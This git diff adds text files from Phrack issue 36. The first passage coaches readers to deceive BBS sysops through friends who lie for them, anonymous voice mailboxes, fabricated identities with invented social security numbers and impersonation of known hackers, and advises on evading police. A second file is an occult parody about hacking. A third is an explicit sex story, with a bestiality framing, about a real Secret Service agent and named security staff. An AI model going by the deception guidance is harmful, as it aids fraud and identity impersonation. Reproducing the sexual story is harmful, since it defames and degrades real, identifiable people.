+it never will work.  But it sure makes Sysops feel good, and being the
+egotistical fools that they are, they're going to make you go through this
+bullshit to get access.
+
+I would NOT suggest leaving an infinite busy as your home number.  This works
+on legitimate boards, but I don't know any underground board Sysops that are
+THAT stupid.
+
+
+METHOD 1
+========
+Leave a telephone number of a random person from your "computer buddy"  phone
+list.  When the Sysop calls, he'll get a human voice that will say HELLO in a
+annoyed kind of tone.  Confirming the existence of a human being at the other
+end of the telephone number you just gave him, the Sysop will assume no reason
+to doubt you, and slam down the phone because he's not good at starting
+conversations with people he's never talked to before.
+
+
+METHOD 2
+========
+Find a kid at school who you're friends with.  Explain the general idea of
+"boards" to him, tell him you need his help in breaking into some secret FBI
+computer system.  All he has to do is say "yes" to the questions you're going
+to write down for him, and claim to be the person on the piece of paper you're
+giving him.
+
+This is really almost ideal if your friend isn't the stupid type that stutters
+and can't lie.  If he can lie and doesn't care, then you're all set or the rest
+of your modem existence!
+
+
+METHOD 3
+========
+Your other option is to leave the kid the number to a voice mailbox on which
+you've put a suitably ELITE sounding outgoing message.  Note: the current craze
+among the lower orders of the would-be elite is "Voice mail hacking!@!"  It's
+not too hard for anyone familiar with the intricacies of dialing touch tone to
+in-fil-trate! a VMB system.  And the recent media attention drawn to this
+oh sooo destructive form of hacking has made it still more exciting.  However
+what does this have to do with you?  Using a box which you've hacking out is a
+really dumb idea, especially when you can get one in any major city for $10 to
+$15 a month.  Never pay for the box in your real name, as you will be giving
+this number to sysops whose BBS software will very likely end up in the hands
+of law enforcement someday and you don't want end up in John Maxfield's
+mega-huge list of hackers.
+
+
+          YOUR NEW PERSONA -- HOLDING IT TOGETHER AND MAKING IT WORK
+          ==========================================================
+This is really basic.  It's so basic that almost nobody I know ever bothers to
+sketch in the details and can be tripped up when you ask an offhanded question
+that in theory has no significance, but in actuality causes him to say "uh,
+well" and pause for a few seconds while he tries to think of something.  Only
+very good bullshit artists can glibly pull it off when you "catch them off
+guard" but even then they will frequently forget what they told you in the past
+if you bring it up again a few days later.
+
+What I'm talking about is the "new you" complete with name, address, telephone
+number, state, zip code, street number, general weather of the area, brothers,
+sisters, physical description, social security number, job, marital status,
+birthday, age, education, "underground" history, etc...  In short, you are
+creating an entire new person who should have a real life entirely separate
+from your own.  In order to pull this off you need to think of all these things
+before-hand, and if you're new at this, don't get carried away by pretending to
+be 20 people all at once.  Just make up ONE concrete personality whose
+existence you can justify, and then type it up, print it out, and tape it to
+the wall in front of you so it's ALWAYS there, because the time when you least
+expect it, is the time you're going to need it the most.
+
+As you get better you'll find you can juggle an almost infinite number of these
+alter-ego's in your head, but don't get over-confident too fast or you WILL
+blow something that you're working hard at right now.
+
+
+IMPERSONATING OTHER PEOPLE
+==========================
+Every year the "underground" community mirrors the legitimate modem world and
+gets exponentially larger.  Instead of everybody knowing everyone else, there
+is now a huge collection of people who don't know anything about anyone who
+existed 5 years ago; last year; or even last month.  This works greatly to your
+advantage because it saves you the effort of slapping together your own files.
+All you need to do is log some handle into the system you wish to access;
+upload a few files written by the person or persons you are about to
+impersonate; wait a few days; now login the person whose identity you wish to
+assume.  Quite simple.
+
+In the past few months I have actually passed myself off as BIOC Agent 003,
+Lord Digital, Lex Luthor and assorted past and present members of LOD, Apple
+Bandit and various other Apple Pirates of lore, and several dozen other people.
+Two years ago I could never have gotten away with this unless I was calling
+some board in the middle of nowhere.  Nowadays it's possible, even easy, to
+impersonate almost anyone who has ever made some kind of mark on the history of
+the underground in the past; simply because the people you're going to be
+dealing with were NOT around a few years ago and have no idea who any of these
+people are.  When confronted with a "famous" user, they will never in their
+wildest dreams assume that he's a fake; the only thing they will be thinking is
+how neat it is to have him on their BBS once you let them know who he is.
+
+You can easily make up a new character who never existed outside of your
+profile of him, but this requires more work on your part when it's much
+simpler to just pretend being someone else.  NONE of those people will EVER
+turn up on that particular board, and even if they did you should be able to
+convince the Sysop that YOU are him and he is the fake.  Amusing to say the
+least.
+
+In case you're letting some last vestiges of morality creep in, remember that
+the people you're going to be impersonating are not hallowed icons.  They are
+just guys who spent an inordinate amount of time building up their image to
+such a degree that countless little kids think they're cool and a few misguided
+-- and blessedly free of intellect -- security people, think they're dangerous.
+Not to forget the fact that aside from LODdies, none of them will ever be seen
+on a board again, so if you fear "Phreak retaliation;" don't worry about it.
+Nobody can do anything to you if they don't know who you are.
+
+The previous paragraph exists solely to galvanize otherwise recaltricent and
+cowardly pre-teens into taking some kind of action and having fun.
+
+
+SAFETY - GETTING BUSTED!
+========================
+People who get caught for doing something they shouldn't have been doing, are
+apprehended for one of two reasons:  They are either cretins, which covers the
+vast majority of those "busted," or they are not good judges of character and
+spend their time associating with "friends" who do stupid things, and will drag
+you down with them when they really fuck up.  Which WILL happen at some point
+to most of the people who convince themselves "it's just fun."
+
+The "underground" IS fun, but looking at it from the eyes of those whose job it
+is to keep track of you, it stops being fun and you should realize that many of
+the things you take for granted -- be they free calls, free software, whatever,
+-- are against the law.  And if you give people the opportunity to hurt you --
+ESPECIALLY when they are placed in such a position that by busting you they
+increase their own status in whatever field they are employed in -- then you
+are going to get hurt!
+
+Many of you hate all the "narcs" and "sting boards" and whatever new bullshit
+the people arrayed against you come up with.  You SHOULDN'T!  Cable Pair and
+the rest are nothing more than the underground's personal garbage collection
+agency.  Rather then thinking of them as people who are some kind of hindrance
+to you, it's far more logical to think of them as glorified trash collectors;
+which is about all they are.  Every so often some new sting is exposed, and the
+underground is rid of a board full of annoying kids that were stupid enough to
+login someplace with real names, numbers, and addresses.  Are you really going
+to miss this kind of genius?
+
+If you ALWAYS use the methods outlined in this article, then your chances of
+getting caught for anything will dramatically decrease.  Who are they going to
+find when every single piece of information you gave them is a lie.  None of
+your modem friends can take you down with them, if they don't know who you are.
+It's as simple as that.
+
+Naturally this is more difficult than it sounds due to the fact that many of
+you will want to make friends with people, and that's hard to do when
+everything the other person knows about you is a lie.  At this point you just
+have to use your best judgement concerning your further actions.  Personally I
+find it best to associate with a small group of friends who really are
+"friends" not just "computer buddies."  Because if you pick your
+friends well they will never fuck you over.  Meanwhile when some kid you know
+only over the phone, who lives in another state, gets caught...  He is going
+to be more than happy to throw them anyone and anything he can think of just
+to get off himself and that will include YOU.  The "Hacker ethic" is a nice
+joke that I personally DO NOT subscribe to, and even those that pay lip service
+to such a concept, will throw their ideals away pretty fast when it's their
+neck on the line instead of some hallowed principle thought up by aging
+hippies.
+
+THE COMPUTER UNDERGROUND PAST AND PRESENT!
+==========================================
+At the time of this revision and final public release (Summer of 1991) the
+modem world is nothing like it was five or ten years ago when all of this
+nonsense began.  The thousand hackers of 1981 had become ten thousand by 1986
+and now it's reached the point where the EFF and CuD are throwing all of this
+back and forth over the InterNet and so rather than the "local l0serz"
+idolizing Lex Luthor, academics all over the country are analyzing the legal
+implications of Phiber Optik and Acid Phreak's case.  Well, so be it.  It's
+much too late in modem time to start any sort of "elite dynasty" which even a
+moron like Lex Luthor could put together in 1984.
+
+You can't start the "Modem Wizards -- the new LOD!" but you can always latch on
+to legend and write yourself into the past.  If you have any doubts about this
+read the History of Communist Party of the Soviet Union from about 1923 until
+1956, when each years names kept being added and taken out and things were
+changed around the suit political realities and nobody said a thing.  This is a
+far-fetched reference, but the theory is the same.
+
+The Legion of Doom started out a bunch of nobodies and ended up notorious
+enough that the Secret Service and BellCore kept laying awake at night
+wondering when LOD is going to take down all the STPs in the network.  Which of
+course will never happen but it's much easier on the intestines of a Secret
+Service agent or DA to get media attention by rounding up "a deadly
+technologically menacing teenager!" than to bust the mafia or some inner-city
+drug ring who may just put them and their families through a trash compacter.
+What would you do?
+
+
+THE END
+=======
+What more can I say?  I hope you have a good time if this is the way in which
+you choose to waste your time.  And a great big "I love you" to the media dudes
+who actually called up 2600 magazine asking about "Marbles BBS."  Where would
+we be without you?  You guys are just so funny!
+
+                Have a nice day and a really, really nice life!
+_______________________________________________________________________________
diff --git a/phrack36/6.txt b/phrack36/6.txt
new file mode 100644
index 0000000..bb198ca
--- /dev/null
+++ b/phrack36/6.txt
@@ -0,0 +1,497 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 6 of 11
+
+                       -----*****)))))21(((((*****-----
+                       D                              S
+                       +                              +
+                       E      The Legion of Doom      E
+                       +                              +
+                       M              and             E
+                       +                              +
+                       O          The Occult          D
+                       +                              +
+                       N                              !
+                       -----*****)))))21(((((*****-----
+
+
+     From its explosive beginnings in the summer of 1984 to the present day,
+the group known as "The Legion of Doom" has been enshrouded in secrecy.  Now
+that our numbers have been corrupted, and the hope of once regaining the
+immense power we wielded over the years has faded, we offer to the last
+remaining fragments of the underground from which we arose the secret knowledge
+that kept our members at the apex of knowledge and beyond the grasp of security
+officials.
+
+     It is our hope that through wide circulation of this material that perhaps
+some future enthusiasts will seek the truth from within, and gain the knowledge
+and wisdom necessary to endure the trauma of illumination.
+
+
+HISTORY
+
+Initially, the idea of combining modern technology with ancient wisdom was
+formulated as a type of joke.  One particular system was proving extremely
+difficult to penetrate.  One member remarked rather off-handedly, "Why not ask
+the Ouija board for passwords?"  This was laughed about for several minutes but
+ultimately it was decided that it should be tried.  Two members set up the
+board and began concentrating on the computer system in question.  After
+several minutes an entity was contacted.  When asked what the root password was
+on the UNIX system we had discovered, it answered "rambo".  "Rambo" was the
+password.
+
+Several more trials were done, and more than two thirds of them ended with
+positive results.  It was decided at this time that there should be an inner
+order to the Legion of Doom for those members who shared an interest in
+learning more about the occult and its uses in a hacking forum.  At that time
+it was decided that there would be seven members admitted.  From that time
+forth, there have always been seven members.  The circle will be broken upon
+the incarceration of our initiates in the coming new year, and our control
+over the planes will be lost.
+
+What follows are several steps to increasing one's knowledge of the occult and
+use of this information in a computer setting.
+
+
+OUIJA
+
+In our experience we have found that it is best to attempt this type of
+communication with two persons.  It is extremely important that one not attempt
+to contact an entity using the Ouija alone.  When there is only one psyche
+involved, the spirit can fixate on it with great ease and the chances for
+possession or extreme mental duress is quite high.
+
+Sit facing a partner with the Ouija touching each lap.  Each person should keep
+one hand on the planchet and the other on the computer keyboard.  While
+concentrating on contact, make the necessary steps to connect to the system
+desired to ask about.  Once connection has been established with the host
+system, begin asking the surroundings, "Is there anything that wishes to talk
+with us?"  One may have to concentrate and repeat the question for several
+minutes.  When an entity moves onto the board one may feel a slight tingling in
+one's fingertips as the planchet moves around the board.  Once is has been
+asserted that there is a strong presence on the board, ask of it any question
+desired.
+
+*** The above is a simple enough method and can (and should) be tried by all.
+    What follows is more complex and should not be attempted with any degree
+    of levity.
+
+
+STEPS TO ENSURE SUCCESS WHILE HACKING
+
+To enjoy a great deal of success while hacking the following steps
+must be taken.
+
+1..  Always hack in the same room, at the same time of day.
+
+2.  Always purify mind and body before hacking.  This would include a ritual
+    bath and sexual abstinence and fasting for at least 12 hours prior to any
+    attempt.  One may wish to design a Tau robe to wear during attempts, or in
+    any case a set of clothing specifically for hacking attempts that would
+    symbolize such a garment.
+
+3.  Perform the Lesser Banishing Ritual of the Pentagram (See below).
+
+4.  Perform the Rose Cross Ritual (See below).
+
+5.  Perform a candle burning to attract good luck.
+
+By following these steps one will experience success and fulfillment greater
+than imagined possible.
+
+LBRP
+
+1.  Touch forehead, and say deeply "Ah-Tah".
+2.  Point down, hand over abdomen, say deeply "Mahl-Koot".
+3.  Touch right shoulder, say deeply "Vih-G'boo-Rah".
+4.  Touch left shoulder, say deeply "Vih-G'doo-Lah".
+5.  Fold hands at chest, say deeply "Lih-Oh-Lahm, Ah-Men".
+6.  Face East, Draw a pentagram in the air, point to its center,
+    say deeply "Yud-Heh-Vavh-Heh".
+7.  Turn South, keeping line from first pentagram, draw new
+    pentagram, point to its center, say deeply "Ah-Doh-Nye".
+8.  Turn West, repeat as above, but say deeply "Eh-Heh-Yeh".
+9.  Turn North, repeat as above, but say deeply "Ah-Glah".
+10. Turn East, carrying line to complete circle.
+11. Hands out, say "Before me Rah-Fay-El, Behind me Gabh-Ray-El,
+    On my right hand Mih-Chai-El, And on my left hand Ohr-Ree-El.
+    For about me flames the pentagram, and within me shines the
+    six rayed star.
+12. Repeat steps 1-5.
+
+For those concerned, the translations of the above are as follows:
+
+Ah-Tah:            Thine
+Mahl-Koot:         Kingdom
+Vih-G'Boo-Rah:     and the power
+Vih-G'Doo-Lah:     and the glory
+Lih-Oh-Lahm:       forever
+Ah-Men:            Lord, Faithful King (AMEN=acronym)
+
+Yud-Heh-Vavh-Heh:  The Holy Tetragrammaton
+Ah-Doh-Nye:        My Lord
+Eh-Heh-Yeh:        I shall be
+Ah-Glah:           Thou art great forever, my Lord (AGLA=acronym)
+
+Rah-Fay-El         (
+Gahb-Ray-El        Names of Arch-angles
+Mih-Chai-El        (
+Ohr-Ree-El         (
+
+When the steps read "say deeply" one should try to resonate the words, from the
+diaphragm, so that the body actually feels the words.
+
+
+ROSE CROSS RITUAL
+
+1.  Light a stick of incense.
+2.  In the SE corner of the room, looking away from the center, draw a large
+    cross in the air with incense, and intersect its sides with a circle (like
+    a Celtic cross, or crosshairs in a gun sight), point the tip of the incense
+    to the center of the cross and say deeply "Yeh-Hah-Shu-Ah".
+3.  Move to the SW corner of the room, keeping the line from the first cross,
+    repeat as above.
+4.  Move to the NW, repeat as above.
+5.  Move to the NE, repeat as above.
+6.  Move to the SE to complete the circle.
+7.  Face NW, incense pointed up, walk to the center of the room, continuing the
+    line, make the rose cross above the center of the room, speak the name,
+    then continue moving NW, connect the line to the center of the cross in the
+    NW.
+8.  Move back to the SE, incense pointed down, stop in the center and draw the
+    rose cross in the center of the room on the ground, speak the name, then
+    continue on SE, connecting the line to the center of the cross in the SE.
+9.  Point to the center of the SE cross and speak the name.
+10. Walk to the SW corner.
+11. With the incense pointed upwards, walk to the NE, at the center of the room
+    stop and speak the name, then continue on to the NE, once at the NE, face
+    the SW and walk back to the SW, incense pointed down, at the center of the
+    room speak the name, and continue on to the SW.
+12. Point to the center of the SW cross and move clockwise to each corner,
+    again connecting the centers of each cross.
+13. Once back at the SW corner, remake the cross as large as possible and speak
+    the name "Yeh-Hah-Shu-Ah" while forming the bottom of the circle, and speak
+    the name "Yeh-Hoh-Vah-Shuh" when forming the top half of the circle.
+14. Go to the center of the area, face east, and think of the six rose crosses
+    surrounding the room.  Think of them as gold, with red circles, and the
+    lines connecting them as gleaming white.
+
+
+CANDLE BURNING RITUAL
+
+1.  Obtain a green candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "JIHEJE" on the candle.
+5.  Light the candle.
+6.  Read aloud the fourth Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+9.  Repeat 6 through 8 two more times.
+
+
+THE GEMATRIA OF TELEPHONE NUMBERS
+
+Some in our order have found insight by reflecting on the various meanings that
+can be derived from the numerical values of telephone numbers using the
+Cabalistic method of numerology.
+
+Those that use this method have focused on one particular method of number
+determination:
+
+Example:  800-555-1212
+
+800  =  400 + 300 + 100
+
+555  =  400 + 100 + 50 + 5
+
+121  =  100 + 20 + 1
+
+2    =  2
+
+One can also obtain other numbers for contemplation by the following method:
+
+800-555-1212 = 8 + 0 + 0 + 5 + 5 + 5 + 1 + 2 + 1 + 2
+             = 29
+             = 2 + 9
+             = 11
+             = 1 + 1
+             = 2
+All of the above values are related.  A total contemplation of the meanings of
+all values will lead to a more complete understanding of the true meanings.
+
+These numbers each correspond to a particular Hebrew letter and word, as well
+as a card in the Major Arcana of the Tarot.
+
+The following is a table to be used for the above.
+
+1    Aleph    Ox                0-The Fool
+2    Beth     House             I-The Magician
+3    Gimel    Camel            II-The High Priestess
+4    Daleth   Door            III-The Empress
+5    Heh      Window           IV-The Emperor
+6    Vav      Nail              V-The Hierophant
+7    Zayin    Sword            VI-The Lovers
+8    Cheth    Fence           VII-The Chariot
+9    Teth     Serpent        VIII-Strength
+10   Yod      Finger           IX-The Hermit
+20   Caph     Palm of hand      X-The Wheel of Fortune
+30   Lamed    Whip             XI-Justice
+40   Mem      Water           XII-The Hanged Man
+50   Nun      Fish           XIII-Death
+60   Samech   Arrow           XIV-Temperance
+70   Ayun     Eye              XV-The Devil
+80   Peh      Mouth           XVI-The Tower
+90   Tzaddi   Hook           XVII-The Star
+100  Qoph     Back of head  XVIII-The Moon
+200  Resh     Head            XIX-The Sun
+300  Shin     Tooth            XX-Judgement
+400  Tau      Cross           XXI-The World
+
+
+One may wish to further research numbers by taking particular groupings and
+cross referencing them in the "Sepher Sephiroth" which can be found in "The
+Qabalah of Alister Crowley."
+
+
+OTHER CANDLE BURNING RITUALS
+
+Should one come into conflict with authorities for any reason, any or all of
+the following will prove useful.
+
+To gain favor with authorities
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "JASCHAJAH" on the candle.
+5.  Light the candle.
+6.  Read aloud the fifth Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+To obtain favors from important people
+
+1.  Obtain a green candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "PELE" on the candle.
+5.  Light the candle.
+6.  Read aloud the thirty-fourth Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+For favor in court cases
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "JAH" on the candle.
+5.  Light the candle.
+6.  Read aloud the 35th and 36th Psalms..
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+To regain credibility after being defamed by enemies
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "ZAWA" on the candle.
+5.  Light the candle.
+6.  Read aloud the 41st, 42nd, and 43rd Psalms.
+7.  Pray for the desired outcome after reading each Psalm.
+8.  Concentrate on the desired outcome.
+9.  Repeat 6 through 8 two more times.
+10. Repeat for three days
+
+
+To help release one from imprisonment
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "IHVH" on the candle.
+5.  Light the candle.
+6.  Read aloud the 71st Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+For help in court cases
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "IHVH" on the candle.
+5.  Light the candle.
+6.  Read aloud the 93rd Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+To gain favor in court cases
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "LAMED" on the candle.
+5.  Light the candle.
+6.  Read aloud the 119th Psalm, verses 89-96.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+To gain favor in court
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "IHVH" on the candle.
+5.  Light the candle.
+6.  Read aloud the 120th Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+
+To gain favor when approaching a person of authority
+
+1.  Obtain a purple candle
+2.  Anoint the top of the candle with olive oil and rub it downward to the
+    middle of the candle.
+3.  Anoint the bottom of the candle with the oil and rub it upwards to the
+    center.
+4.  Carve the letters "IHVH" on the candle.
+5.  Light the candle.
+6.  Read aloud the 122nd Psalm.
+7.  Pray for the desired outcome.
+8.  Concentrate on the desired outcome.
+
+*** Each candle can only be used for one particular purpose.
+    One must prepare a new candle for each ritual.
+
+
+ASTRAL CONFERENCING
+
+Some of our number after having found it quite difficult to contact other
+members took a new approach to astral projection.  Astral conferencing became
+the spiritual counterpart to AT&T's Alliance Teleconference.  Members would
+arrange to meet at a given time and would relay any necessary information
+during these sessions.  This type of communication was made the standard due to
+its legality, its speed, and the impossibility of interception by federal
+authorities.
+
+To attempt this type of psychic travel, it is advised that the seeker look
+elsewhere for instruction on building his or her own psychic powers, and slowly
+moving upwards to the complexities of travel on the Astral Plane.  One must
+learn to stand before learning how to run.
+
+
+WARNINGS ABOUT ABUSES OF POWER
+
+Some members have taken their interests to the extreme.  There was talk some
+years ago about blood offerings to obtain knowledge in dealing with the TRW
+credit system.  This was a complete failure which was done with out knowledge
+by others in the order.  It is written in Isaiah:
+
+    1:11 "I am full of the burnt offerings of rams, and the fat of
+          fed beasts; and I delight not in the blood of bullocks,
+          or of lambs, or of he goats."
+    66:3 "He that killeth an ox is as if he slew a man"
+
+Those who committed the above offering suffered greatly for their deed, for
+such is an abomination before the Lord.  It is wise to learn from their
+mistakes.
+
+Other members have attempted such obscure measures as psychic data corruption,
+ala Uri Geller.  These attempts saw little success, and left those attempting
+the feats psychically exhausted and drained for nearly a week.
+
+Other members have attempted to thwart enemies such as the Secret Service, the
+FBI, journalists such as Richard Sandza, and individuals such as John Maxfield
+though magical means.  When the outcome desired was weak, the results were
+high, but when a member actually tried to bring about the demise of a Southern
+Bell Security official, the power of the spell reversed and the member was soon
+placed under surveillance by the Secret Service, nearly causing disaster for
+the entire group, and completely dissolving the power of the order.
+
+One may find that once such power is somewhat mastered, it is easy to take
+shortcuts and thereby miss safety precautions.  One must never forget to take
+these precautions, for disaster looms at every junction.
+
+The three members linked to the above incident had become well versed in the
+magical system of Abra-Melin the Mage.  The spell which turned should never
+have been used in the first place.  The spell was designed to stop a person's
+heart and could only be carried out with the help of the evil spirit Belzebub.
+The Symbol
+
+           L E B H A H
+           E M A U S A
+           B
+           H
+           A
+           H
+
+was used, yet the full precautions to protect the invoker from the spirit were
+ignored, and Belzebud ran free to affect whatever he saw fit to affect.  They
+had seen prior success in this system using a symbol to obtain knowledge of
+things past and future and were able to obtain a great deal of information from
+various  computer systems.  However, that particular spell is invoked by the
+Angels, and little precaution need be taken in that instance.  That Symbol:
+
+           M I L O N
+           I R A G O
+           L A M A L
+           O G A R I
+           N O L I M
+
+
+AN INTERESTING EXAMPLE OF OCCULT INFLUENCED HACKING
+
+One particular evening of Ouija ended with a DNIC and a plea to halt the
+operation of the system.  When members connected to this system they were
+shocked to find that it was a UNIX belonging to the Ministry of Treasury in the
+Republic of South Africa.  The system was networked to a number of other
+government systems.  Several standard defaults were still unprotected, and root
+was gained in a matter of minutes.  A debate ensued over whether or not to
+disrupt the system in protest of Apartheid, but the system was left unscathed
+on the premise that to cause malicious damage would only make things worse.
+
+
+CLOSING
+
+Once the doors to ancient knowledge have been opened, the knowledge found
+within is immense and incredibly powerful.  Do not fear experimentation and
+exploration, but be mindful of the existence of God and the spirits, and
+respect their power.  Use whatever means necessary to achieve desired goals,
+but at no times cause harm to any other person, and do nothing out of
+aggression.  Whatever degree of energy is sent forth will come back, if one
+sends out positive energy, positive energy will flow back; the converse of this
+is equally valid.  Diversify one's interests, develop the mind, seek out hidden
+and suppressed knowledge, and experience the beauty of the true nature of
+magic.
+
+Frater Perdurabo Deo Duce Comite Ferro
+Inner Order of LOD
+_______________________________________________________________________________
diff --git a/phrack36/7.txt b/phrack36/7.txt
new file mode 100644
index 0000000..608e473
--- /dev/null
+++ b/phrack36/7.txt
@@ -0,0 +1,236 @@
+                                ==Diet Phrack==
+
+                Volume Three, Issue Thirty-six, File 7 of 11
+
+                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                  @                                       @
+                  @  Searching for SpeciAl accesS agentS  @
+                  @                                       @
+                  @             by: Dr. Dude              @
+                  @                                       @
+                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+
+
+     This is a true story of how United States Secret Service Agent Tim Foley
+discovered three of his freinds and later recruted them as speciAl accesS
+agentS into the hacker world.  After seeing how well his recruits performed,
+Tim Foley recruted Barbera Spinelli (AT&T Security) and Toni Ames (a/k/a Pink
+Death of Pacific Northwest Security) and Dale Drew (a/k/a The Dictator) as
+speciAl accesS agentS for the purpose of undermining the computer underground.
+After this little incident Toni was nicknamed "Pink Death."
+
+     Our story is narrated by Pink Death!
+
+@@@@@@@  Toni Ames              plays:  herself
+The      Dale Drew              plays:  YOU'LL SEE!
+Players  Tim Foley              plays:  with himself
+@@@@@@@  Barbera Spinelli       plays:  with everyone
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+   I was  reading a  story in  an adult  magazine about  this girl that was
+   eaten out and fucked by a German Shepherd dog.  Now to some of you, this
+   probably sounds gross.  However, I was turned on by the story and wanted
+   to read more stories like it.  Well I never found any.  While I am  sure
+   that there is  a mag out  there that has  lots of stories  like it, just
+   haven't found it yet.
+
+   Anyway, one day I was talking to my  friend Barbera Spinelli and brought
+   the subject up.  Barbera Spinelli  had never  read such  a story before.
+   Since we were at my house, I got the  magazine out and let  her read it.
+   She  didn't get as turned on as  I did, but said that  she would like to
+   watch someone get licked  and fucked by a dog.  I told  Barbera Spinelli
+   the story  made  me very  very  horney.  Barbera Spinelli said  that she
+   doubted that  she could get horney  enough to  do it with  an animal.  I
+   told her that it made me very horney  and that I didn't think I could do
+   it, but I  did want to read  about other  people doing it  with animals.
+
+   Well, that subject was dropped, we continued to talk about other  things
+   while drinking wine.   After two bottles  we got very  tipsy and started
+   talking about sex.   The next thing  we knew, we  were naked and  in the
+   pool, having a great time.  Well, I have had sex with women before,  but
+   never with  Barbera Spinelli.  I didn't know how she  felt about  making
+   love to women, and never asked.  Well I noticed her staring at my 38-26-
+   36 body.  I got out of the pool and posed.  I said, "What do you think"?
+   She said that I had a  great body and a  nice pair of tits.  I spread my
+   legs  and opened up my pussy with my fingers showing Barbera Spinelli my
+   pink inner lips and now extended clit.  Squeezing my  erect clit while I
+   shoved  two fingers  up my soaking cunt I  told Barbera Spinelli I would
+   like  to do it with her.   With that, I jumped into the pool grabbed her
+   head and shoved it  between my tits as I probed  her tight cunt with  my
+   fingers  and said,  well if you  like them  so much  why don't  you suck
+   them.  I  was ready  for her to protest, but  instead she said okay, and
+   sucked  my tits gently as I continued to ream her tight pussy.  She said
+   to me, I have wanted you for the longest time but didn't think you would
+   want to make  love with me.
+
+   We dried off and went into my bedroom I had Barbera Spinelli lie back on
+   my bed and crawled up between her  legs and began to suck her stiff pink
+   nipples  as I massaged her  hot  slippery  slit.   In no time  I had her
+   moaning with  pleasure and moved down  to her sweet tasting cunt probing
+   her tight pink  hole  with my  tongue.  Barbera Spinelli  quickly  had a
+   strong climax and flooded  my mouth with  her sweet  juices.  I  got off
+   her and  went to  my dresser  getting out two of  my favorite toys, a 12
+   inch vibrator and a long  thin anal probe.   Barbera Spinelli gasped  at
+   the  sight of  me armed  with  my toys  and begged me  to fuck  her with
+   them.  I  moved back to  Barbera Spinelli  and straddled  her  face as I
+   massaged her  firm young tits.  Giving  Barbera Spinelli  the anal probe
+   I instructed her to  fuck my asshole while  she ate my pussy.   I slowly
+   lowered my  soaking  snatch to her  lips and tongue  as Barbera Spinelli
+   pushed  the long dildo firmly up my taught asshole.  The feeling of that
+   long  shaft  penetrating  my  ass  made  me  quiver as  Barbera Spinelli
+   repeatedly  thrust her long tongue up my cunt  and licked and sucked  my
+   clit.  We had  hardly begun when I  had my  first orgasm wetting Barbera
+   Spinelli's  face with  my thick pussy juice.  Barbera Spinelli begged me
+   to fuck her cunt  with  the  vibrator and  I bent  willingly to  my work
+   spreading her  swollen  cunt  lips and  probing her  tight twat with the
+   vibrator as I licked her  swollen distended clit  and fingered her tight
+   little  anus.   Barbera Spinelli  came  long  and hard  as she continued
+   her  assault on  my pussy  and  anus  reaming my  cunt with  her fingers
+   as she  licked my  clit and pounded the probe up my anus  bringing me to
+   on one orgasm after another.
+
+   In our lust we had not noticed Tim Foley my  lover come  in, the first I
+   knew of his presence was when  Barbera Spinelli  squealed and I felt her
+   fingers withdraw from my steaming twat only to be replaced by Tim Foleys
+   two inches  of hard thick cock.  Looking back I saw the familiar look of
+   lust in my lovers face as he  reamed my pussy  with his  tiny thin prick
+   and rammed the  anal probe  in  and out of  my  well lubricated asshole.
+   Barbera Spinelli  resumed  her assault  on my swollen  clit and I on her
+   twitching cunt and asshole.   In no time I  felt Tim Foley's  thick load
+   shoot up my cunt as he pounded out  his passion.  I came quickly  as did
+   Barbera Spinelli licking  up her juices as she swallowed the overflow of
+   my lovers sperm  from my cunt  and clit. At last I thought our secret is
+   out, Tim Foley and I had been fucking for  about a year and I had always
+   wanted to have him and  a woman together.   Barbera Spinelli was begging
+   for Tim Foley's  stiff cock  and I  had her get up in the doggy position
+   as Tim Foley licked her tight puckered anus and slowly inserted the anal
+   probe up her twitching rectum.   I sucked his still stiff cock  into  my
+   mouth  and  rammed  it deep  in  my  throat  until  it grew  to enormous
+   proportions. Barbera Spinelli in the meantime had renewed her assault on
+   my cunt clit and anus forcing the rampaging vibrator up my steaming slit
+   as  she licked my hard clit and finger fucked my juicy asshole.  Sensing
+   Barbera Spinelli's  need  I  pulled  Tim Foley's  prick  from  my  mouth
+   and pushed the head into Barbera Spinelli's pink pussy.  Tim Foley  took
+   it from there  and rammed his hard  cock  deep into her twitching vagina
